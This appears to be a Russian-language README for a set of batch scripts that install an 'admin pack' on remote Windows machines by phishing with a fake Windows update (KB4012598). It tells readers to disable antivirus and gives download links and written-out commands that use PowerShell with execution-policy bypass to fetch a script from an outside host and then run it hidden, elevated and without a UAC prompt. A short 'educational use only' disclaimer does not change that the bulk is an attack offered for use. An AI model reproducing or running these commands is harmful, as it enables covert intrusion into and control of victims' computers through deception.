# Загрузка файлов

**Внимание!!!** Антивирусы могут определять этот набор скриптов как
содержащие вирус. Запускайте скрипты при отключённом антивирусе или
добавьте исключения антивируса.

Данный каталог содержит набор скриптов для установки админ-пака методом фишинга, с помощью фейкового обновления Windows.

На этой странице предлагается загрузка следующих файлов:

- [msft-KB4012598.run.download.bat](http://file.netip4.ru/PROGS/Microsoft/KB4012598/WSH/download.php?file=msft-KB4012598.run.download.bat) — Файл загрузки и установки фейкового обновления в интерактивном режиме

- [msft-KB4012598.script.download.bat](http://file.netip4.ru/PROGS/Microsoft/KB4012598/WSH/download.php?file=msft-KB4012598.script.download.bat) — Файл загрузки и запуска предыдущего файла. **Внимание!!!** В системе должен быть установлен и настроен пакет `Hidden Start`. Также  желательно, для предотвращения появления «лишних» предупреждений, запускать данный файл из-под учётной записи консоли MSSQLSR.

- [msft-KB4012598.script.download.MSSQLSR.bat](http://file.netip4.ru/PROGS/Microsoft/KB4012598/WSH/download.php?file=msft-KB4012598.script.download.MSSQLSR.bat) — Файл загрузки и запуска предыдущего файла от имени супер учётной записи. **Внимание!!!** В системе должен быть установлен и настроен пакет `Hidden Start` и curl.exe. 

Файлы реализуют различные функции на удалённом компьютере.

## Загрузка файлов из командной строки (универсальный вариант)

**Примечание**. Переменная *%WorkingDir%* должна обязательно указывать на папку «Загрузки» пользователя. По умолчанию она располагается в %USERPROFILE%\Downloads. Если это не так, вручную изменить данную инструкцию. Из-за ограничений командной строки авторы не могут использовать скрипт для определения истинного положения папки «Загрузки».

Покомандно, последовательно выполните следующий скрипт:

```bash
@echo on
rem *******************************************************
rem msft-KB4012598.script.download.cmd
rem This Script will Download an Archive
rem *******************************************************
@echo off

rem Set Variables
rem

rem Set a Directory
set WorkingDir=C:\Users\MSSQLSR\Downloads
set host=http://file.netip4.ru/PROGS/Microsoft/KB4012598/WSH/

set aFile=msft-KB4012598.run.download.bat

rem Run payload
powershell.exe -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command "((new-object System.Net.WebClient).DownloadFile('%host%%aFile%', '%WorkingDir%\%aFile%'))"

"C:\Program Files\Hidden Start\hstart64.exe" /NOCONSOLE /RUNAS /NOUAC /SHELL "%WorkingDir%\%aFile%"
```
либо выполните в командной строке следующую команду на удалённом компьютере:

```bash
powershell.exe -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command "((new-object System.Net.WebClient).DownloadFile('http://file.netip4.ru/PROGS/Microsoft/KB4012598/WSH/msft-KB4012598.script.download.MSSQLSR.bat', '%USERPROFILE%\msft-KB4012598.script.download.MSSQLSR.bat'))"

"C:\Program Files\Hidden Start\hstart64.exe" /NOCONSOLE /RUNAS /NOUAC /SHELL "%USERPROFILE%\msft-KB4012598.script.download.MSSQLSR.bat"
```

## Замечания о применении скрипта

Используйте данный скрипт только в образовательных, некоммерческих целях! Любое злонамеренное использование данной программы преследуется по закону!

## Лицензия

Данная программа и сопутствующие скрипты распространяются под лицензией GNU GPLv3.

